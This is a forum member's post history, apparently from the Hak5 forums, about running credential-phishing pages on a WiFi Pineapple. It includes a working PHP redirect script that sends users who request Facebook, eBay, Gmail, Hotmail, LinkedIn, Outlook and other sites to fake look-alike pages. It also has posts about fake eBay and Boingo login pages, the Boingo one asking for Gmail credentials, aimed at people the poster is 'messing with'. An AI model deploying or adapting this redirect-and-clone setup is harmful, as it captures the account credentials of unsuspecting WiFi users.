Jump to content

CrackAlot

Active Members
  • Posts

    11
  • Joined

  • Last visited

Everything posted by CrackAlot

  1. yeah, I am putting that on all of them.. just to make sure to atleast make an effort for them to know I am messing with them. If they dont get it, there is not much I can do.. lol
  2. Here is my fake ebay, playing arround with it. any one have a better one? **Removed**
  3. I was thinking a frame or something and passing a cookie to the client.. but that just seems like a bad idea with poor results..
  4. **Removed** Here is my page, its ruff, but you get the idea.
  5. LOL, I do this with a boingo page... free internet if you use your gmail account.. but the letting them get to the internet afterwards is as stated not working, but I am ready for it ;)
  6. Ok, so here is the problem I had and the solution. problem: I downloaded someones pages and added them to my redirect script. My pages still worked fine, but the new ones would just refresh constantly without ever loading content. I thought for sure my redirect.php was messed up some how. solution: So me being in a hurry, I typed in .html after every line not looking at the .htm extension on these new files and spent hours trying to figure out what was going on. I then, just had a brain fart and noticed what I had been missing for days. Moral of the story, don't expect everyone to name there html files .html. Here is my working redirect.php <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "example")){ header('Status: 302 Found'); header('Location: example.html'); } if (strpos($ref, "facebook")) { header('Status: 302 Found'); header('Location: facebook.html'); } if (strpos($ref, "ebay")) { header('Status: 302 Found'); header('Location: ebay.html'); } if (strpos($ref, "twitter")) { header('Status: 302 Found'); header('Location: twitter.html'); } if (strpos($ref, "dropbox")) { header('Status: 302 Found'); header('Location: dropbox.htm'); } if (strpos($ref, "netflix")) { header('Status: 302 Found'); header('Location: netflix.htm'); } if (strpos($ref, "ustream")) { header('Status: 302 Found'); header('Location: ustream.htm'); } if (strpos($ref, "vimeo")) { header('Status: 302 Found'); header('Location: vimeo.htm'); } if (strpos($ref, "youtube")) { header('Status: 302 Found'); header('Location: youtube.htm'); } if (strpos($ref, "gmail")) { header('Status: 302 Found'); header('Location: gmail.htm'); } if (strpos($ref, "blogger")) { header('Status: 302 Found'); header('Location: blogger.htm'); } if (strpos($ref, "googleplus")) { header('Status: 302 Found'); header('Location: googleplus.htm'); } if (strpos($ref, "hotmail")) { header('Status: 302 Found'); header('Location: hotmail.htm'); } if (strpos($ref, "linkedin")) { header('Status: 302 Found'); header('Location: linkedin.htm'); } if (strpos($ref, "outlook")) { header('Status: 302 Found'); header('Location: outlook.htm'); } if (strpos($ref, "boingo")) { header('Status: 302 Found'); header('Location: boingo.html'); } require('boingo.html'); ?>
  7. I am seeing the same issue. I have not tore into it yet, but 2.7.4 was working ok, but 2.7.5 is not. I am not 100% yet on the problem, but figured I would chime in on this.
  8. Love the product and glad its not an iphone. ;) The best thing about the pineapple is how many different configurations you can try. What works for some may not work for others, but if you give up trying, you may never find what works best for you. Thanks Hak5 and WM for the awesome stuff. I get excited when I see a new module of phish site that someone has shared, gives me something to do with my boring days at work. cp
  9. Figured out after reading this post: http://forums.hak5.org/index.php?/topic/25966-sent-from-my-pineapple/ Sorry about that. Still getting use to all the ways things are posted here.
  10. Just noticed after I upgraded a new Mark iv to 2.7.4 I show ssmtp not installed. I did a find on the file system and its not there. just making sure I wasnt missing something. Cheers!
×
×
  • Create New...